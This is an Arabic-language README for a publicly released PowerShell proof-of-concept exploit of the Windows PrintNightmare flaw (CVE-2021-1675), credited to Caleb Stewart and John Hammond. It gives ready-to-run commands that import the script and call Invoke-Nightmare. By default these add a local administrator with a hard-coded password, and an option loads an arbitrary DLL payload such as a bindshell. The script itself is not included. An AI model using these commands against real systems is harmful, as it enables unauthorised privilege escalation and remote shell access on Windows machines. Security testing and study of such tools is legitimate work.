
Caleb Stewart | John Hammond | July 1, 2021
CVE-2021-1675 هي ثغرة حرجة في تنفيذ التعليمات البرمجية عن بُعد وتصعيد الصلاحيات محليًا، أُطلق عليها اسم "PrintNightmare".
تم إصدار استغلالات لإثبات المفهوم (Python, C++) لإمكانية تنفيذ التعليمات البرمجية عن بُعد، ونسخة C# لتصعيد الصلاحيات محليًا. لم نرَ تنفيذًا أصليًا بـ PowerShell خالص، وأردنا أن نجرب قدرتنا على تحسين الاستغلال وإعادة صياغته.
ينفّذ هذا السكربت PowerShell تصعيد الصلاحيات المحلي (LPE) باستخدام تقنية هجوم PrintNightmare.

تم اختباره على Windows Server 2016 وWindows Server 2019.
إضافة مستخدم جديد إلى مجموعة المسؤولين المحليين افتراضيًا:
Import-Module .\cve-2021-1675.ps1
Invoke-Nightmare # add user `adm1n`/`P@ssw0rd` in the local admin group by default
Invoke-Nightmare -DriverName "Xerox" -NewUser "john" -NewPassword "SuperSecure"
قم بتوفير حمولة DLL مخصصة، لفعل أي شيء آخر قد ترغب به.
Import-Module .\cve-2021-1675.ps1
Invoke-Nightmare -DLL "C:\absolute\path\to\your\bindshell.dll"